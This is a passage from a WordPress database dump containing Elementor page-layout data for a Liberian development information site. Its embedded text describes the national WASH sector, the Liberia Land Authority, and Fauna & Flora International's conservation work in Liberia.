et_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17831,2626,'_elementor_edit_mode','builder'),(17832,2626,'_elementor_template_type','section'),(17833,2626,'_elementor_controls_usage','a:0:{}'),(17834,2626,'_elementor_version','2.7.5'),(17835,2626,'_wp_page_template','default'),(17836,2626,'_elementor_data','[{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17838,2627,'_elementor_edit_mode','builder'),(17839,2627,'_elementor_template_type','wp-post'),(17840,2627,'_elementor_version','2.7.5'),(17841,2627,'_wp_page_template','default'),(17842,2627,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c15c0a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"67bf510\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f23c00\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"06ca2c7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"wash\\\",\\\"tag_id\\\":\\\"166\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"wash\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17844,2457,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17845,2628,'_elementor_edit_mode','builder'),(17846,2628,'_elementor_template_type','wp-post'),(17847,2628,'_elementor_version','2.7.5'),(17848,2628,'_wp_page_template','default'),(17849,2628,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17853,2629,'_elementor_edit_mode','builder'),(17854,2629,'_elementor_template_type','wp-post'),(17855,2629,'_elementor_version','2.7.5'),(17856,2629,'_wp_page_template','default'),(17857,2629,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17860,1614,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17861,2630,'_elementor_edit_mode','builder'),(17862,2630,'_elementor_template_type','wp-post'),(17863,2630,'_elementor_version','2.7.5'),(17864,2630,'_wp_page_template','default'),(17865,2630,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"j